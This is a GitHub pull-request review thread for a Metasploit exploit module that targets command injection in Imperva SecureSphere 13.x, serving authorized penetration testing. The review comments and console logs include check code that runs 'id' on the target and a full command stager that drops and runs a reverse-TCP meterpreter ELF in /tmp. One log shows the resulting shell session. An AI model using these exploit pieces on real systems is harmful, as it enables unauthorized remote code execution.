Add imperva_securesphere_exec module
rapid7/metasploit-framework pull request #11210
Opened 2019-01-08 06:37 UTC by rsp3ar

Implement MSF module for https://www.exploit-db.com/exploits/45542

Below are the packet captures for exploiting the vulnerabilities in pre-ftl and gateway mode in the document:
[preftl.mode.pcap.zip](https://github.com/rapid7/metasploit-framework/files/2735405/preftl.mode.pcap.zip)
[gateway.mode.pcap.zip](https://github.com/rapid7/metasploit-framework/files/2735406/gateway.mode.pcap.zip)

2019-01-08 09:11 UTC, bcoles commented
This module could be updated to use a command stager fairly easily.

Take a look at [mvpower_dvr_shell_exec](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/mvpower_dvr_shell_exec.rb) as an example.

2019-01-09 04:13 UTC, rsp3ar commented
the module has been updated to use command stager instead. Attached the new pcaps:
[cmdstager.preftl.mode.pcap.zip](https://github.com/rapid7/metasploit-framework/files/2739334/cmdstager.preftl.mode.pcap.zip)
[cmdstager.gateway.mode.pcap.zip](https://github.com/rapid7/metasploit-framework/files/2739335/cmdstager.gateway.mode.pcap.zip)

2019-01-09 20:44 UTC, bcoles commented on modules/exploits/linux/http/imperva_securesphere_exec.rb
> +  def check
The regex for `\(.+\)` is probably unnecessary. A check for `/uid=\d+/` is probably sufficient. Not that it should make a difference.

Also, golfed/tidied:

```ruby
  def check
    res = execute_command('id')

    unless res
      vprint_error 'Connection failed'
      return CheckCode::Unknown
    end

    if res.body =~ /uid=\d+\(.+\)/
      return CheckCode::Vulnerable
    end

    CheckCode::Safe
  end
```

2019-01-09 20:44 UTC, bcoles commented on modules/exploits/linux/http/imperva_securesphere_exec.rb
> +        OptBool.new('SSL', [false, 'Use SSL', true]),
This option is imported from the `HttpClient` mixin. Rather than redefine it here, it should be added to the `DefaultOptions` key in the module Hash.

```ruby
'DefaultOptions' => { 'SSL' => true },
```

2019-01-09 20:44 UTC, bcoles commented on modules/exploits/linux/http/imperva_securesphere_exec.rb
> +        OptInt.new('TIMEOUT', [false, 'HTTP connection timeout', 3])
Is there a reason the timeout is set to such a small value?

`15` or `25` are traditional, and safer default for exploitation over slow networks (slow VPN, bad wifi signal, slow proxy, ...)

2019-01-09 20:44 UTC, bcoles commented on modules/exploits/linux/http/imperva_securesphere_exec.rb
> +        'Authorization' => 'Basic ' + Rex::Text.encode_base64(datastore['USER'] + ':' + datastore['PASS'])
You should be able to use the `basic_auth` method from the `HttpClient` mixin here.

```suggestion
        'Authorization' => basic_auth(datastore['USER'], datastore['PASS'])
```

2019-01-09 20:44 UTC, bcoles commented on modules/exploits/linux/http/imperva_securesphere_exec.rb
> +        @cookie = res.get_cookies
There should probably be a check here for whether the request failed.

```suggestion
        unless res
          fail_with(Failure::Unreachable, "#{peer} - Connection failed")
        end

        @cookie = res.get_cookies
```

2019-01-09 20:44 UTC, bcoles commented on modules/exploits/linux/http/imperva_securesphere_exec.rb
> +    res
Does the server return anything? Would it be useful to check the response code or response body to ensure everything is operating as intended?

2019-01-10 07:37 UTC, rsp3ar commented on modules/exploits/linux/http/imperva_securesphere_exec.rb
> +  def check
The regex for checking returned uid has been updated to `uid=\d+`.  

For the 'Connection failed' cases, for example, unreachable target, the `execute_command` would throw out `Failure::Unreachable` at the follow line.
https://github.com/rapid7/metasploit-framework/blob/3aabeee959e275be05ac127d936b5950aad6b859/modules/exploits/linux/http/imperva_securesphere_exec.rb#L99

It seems without catching the `Failure::Unreachable` exception, below code wouldn't get executed, and cause check to end silently without any output.
```
    unless res
      vprint_error 'Connection failed'
      return CheckCode::Unknown
    end
```

2019-01-10 08:04 UTC, rsp3ar commented on modules/exploits/linux/http/imperva_securesphere_exec.rb
> +    res
Added check for response code & keyword inside response body in case of successful command execution. Please let me know if that looks good.

2019-01-10 16:22 UTC, bcoles commented on modules/exploits/linux/http/imperva_securesphere_exec.rb
> +  def check
Are you sure? `vprint_*` error messages require `set VERBOSE true`.

2019-01-11 02:48 UTC, rsp3ar commented on modules/exploits/linux/http/imperva_securesphere_exec.rb
> +  def check
Below is the check function that I tried:
```
  113   def check
~ 114     print_status("Before execute_command")
~ 115     res = execute_command('id')
~ 116     print_status("After execute_command")
~ 117
+ 118     unless res
+ 119       vprint_error 'Connection failed'
  120       return CheckCode::Unknown
  121     end
```
I set the RHOST to a non-exist one, and the connection should fail, the output is:
```
msf5 exploit(linux/http/imperva_securesphere_exec) > set verbose true
verbose => true
msf5 exploit(linux/http/imperva_securesphere_exec) > set RHOSTS 192.168.146.254
RHOSTS => 192.168.146.254
msf5 exploit(linux/http/imperva_securesphere_exec) > check

[*] Before execute_command
msf5 exploit(linux/http/imperva_securesphere_exec) > exploit

[*] Started reverse TCP handler on 192.168.146.215:4444
[*] Before execute_command
[-] Exploit aborted due to failure: unreachable: 192.168.146.254:443 - Could not connect to the web service
[*] Exploit completed, but no session was created.
```

The `exploit` did catch the failure correctly, however, `check` function failed silently if I didn't explicitly catch the exception generated by `execute_command` in case of failed connection.

2019-01-17 07:34 UTC, rsp3ar commented on modules/exploits/linux/http/imperva_securesphere_exec.rb
> +    res
Thanks for the suggestion, after testing, I ran into issue with `linux/x64/meterpreter/reverse_tcp`, where the server side CGI wouldn't return and `res` would be `nil` when specified TIMEOUT is reached, even though the meterpreter session was successfully created in the background. 

Below is an example:
```
msf5 exploit(linux/http/imperva_securesphere_exec) > exploit

[*] Started reverse TCP handler on 192.168.146.217:4444
[*] Sending payload linux/x64/meterpreter/reverse_tcp
[*] Generated command stager: ["echo -en \\\\x7f\\\\x45\\\\x4c\\\\x46\\\\x02\\\\x01\\\\x01\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\x00\\\\x3e\\\\x00\\\\x01\\\\x00\\\\x00\\\\x00\\\\x78\\\\x00\\\\x40\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x40\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x40\\\\x00\\\\x38\\\\x00\\\\x01\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x01\\\\x00\\\\x00\\\\x00\\\\x07\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x40\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x40\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x1d\\\\x01\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc2\\\\x01\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x6a\\\\x39\\\\x58\\\\x0f\\\\x05\\\\x48\\\\x85\\\\xc0\\\\x74\\\\x08\\\\x48\\\\x31\\\\xff\\\\x6a\\\\x3c\\\\x58\\\\x0f\\\\x05\\\\x6a\\\\x39\\\\x58\\\\x0f\\\\x05\\\\x48\\\\x85\\\\xc0\\\\x74\\\\x08\\\\x48\\\\x31\\\\xff\\\\x6a\\\\x3c\\\\x58\\\\x0f\\\\x05\\\\x48\\\\x31\\\\xff\\\\x6a\\\\x09\\\\x58\\\\x99\\\\xb6\\\\x10\\\\x48\\\\x89\\\\xd6\\\\x4d\\\\x31\\\\xc9\\\\x6a\\\\x22\\\\x41\\\\x5a\\\\xb2\\\\x07\\\\x0f\\\\x05\\\\x48\\\\x85\\\\xc0\\\\x78\\\\x52\\\\x6a\\\\x0a\\\\x41\\\\x59\\\\x56\\\\x50\\\\x6a\\\\x29\\\\x58\\\\x99\\\\x6a\\\\x02\\\\x5f\\\\x6a\\\\x01\\\\x5e\\\\x0f\\\\x05\\\\x48\\\\x85\\\\xc0\\\\x78\\\\x3b\\\\x48\\\\x97\\\\x48\\\\xb9\\\\x02\\\\x00\\\\x11\\\\x5c\\\\xc0\\\\xa8\\\\x92\\\\xd9\\\\x51\\\\x48\\\\x89\\\\xe6\\\\x6a\\\\x10\\\\x5a\\\\x6a\\\\x2a\\\\x58\\\\x0f\\\\x05\\\\x59\\\\x48\\\\x85\\\\xc0\\\\x79\\\\x25\\\\x49\\\\xff\\\\xc9\\\\x74\\\\x18\\\\x57\\\\x6a\\\\x23\\\\x58\\\\x6a\\\\x00\\\\x6a\\\\x05\\\\x48\\\\x89\\\\xe7\\\\x48\\\\x31\\\\xf6\\\\x0f\\\\x05\\\\x59\\\\x59\\\\x5f\\\\x48\\\\x85\\\\xc0\\\\x79\\\\xc7\\\\x6a\\\\x3c\\\\x58\\\\x6a\\\\x01\\\\x5f\\\\x0f\\\\x05\\\\x5e\\\\x5a\\\\x0f\\\\x05\\\\x48\\\\x85\\\\xc0\\\\x78\\\\xef\\\\xff\\\\xe6>>/tmp/kgpQY ; chmod 777 /tmp/kgpQY ; /tmp/kgpQY ; rm -f /tmp/kgpQY"]
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (816260 bytes) to 192.168.146.201
[-] Exploit aborted due to failure: unreachable: 192.168.146.201:443 - Could not connect to the web service
[*] Exploit completed, but no session was created.
msf5 exploit(linux/http/imperva_securesphere_exec) > show seInterrupt: use the 'exit' command to quit
msf5 exploit(linux/http/imperva_securesphere_exec) > sessions -l

Active sessions
===============

  Id  Name  Type                   Information                                             Connection
  --  ----  ----                   -----------                                             ----------
  10        meterpreter x64/linux  uid=497, gid=497, euid=497, egid=497 @ 192.168.146.201  192.168.146.217:4444 -> 192.168.146.201:49434 (192.168.146.201)
```

2019-02-27 04:02 UTC, rsp3ar commented on modules/exploits/linux/http/imperva_securesphere_exec.rb
> +      unless datastore['ForceExploit']
Added `ForceExploit` register part and the ident has been fixed.

2019-02-27 04:02 UTC, rsp3ar commented on modules/exploits/linux/http/imperva_securesphere_exec.rb
> +    res
Thank, that looks good. The indentation has been fixed.

2019-03-05 10:51 UTC, busterb approved these changes

2019-03-05 16:54 UTC, wvu requested changes

2019-03-05 16:54 UTC, wvu-r7 commented on modules/exploits/linux/http/imperva_securesphere_exec.rb
> +    unless datastore['USER'].to_s.empty? or datastore['PASS'].to_s.empty?
This module should use positively worded logic where possible, C-style logical operators, and avoid nested conditionals (early return ideally).

I also suggest moving the `check` and `exploit` methods under `initialize` as we normally do.

2019-03-06 03:52 UTC, merged

2019-03-06 03:54 UTC, wvu-r7 commented
https://github.com/rapid7/metasploit-framework/commit/4e76eeceb7627d4635772f100f62d44098ed394c

2019-03-06 03:56 UTC, wvu-r7 commented
# Release Notes

This adds a command injection exploit against Imperva SecureSphere 13.x.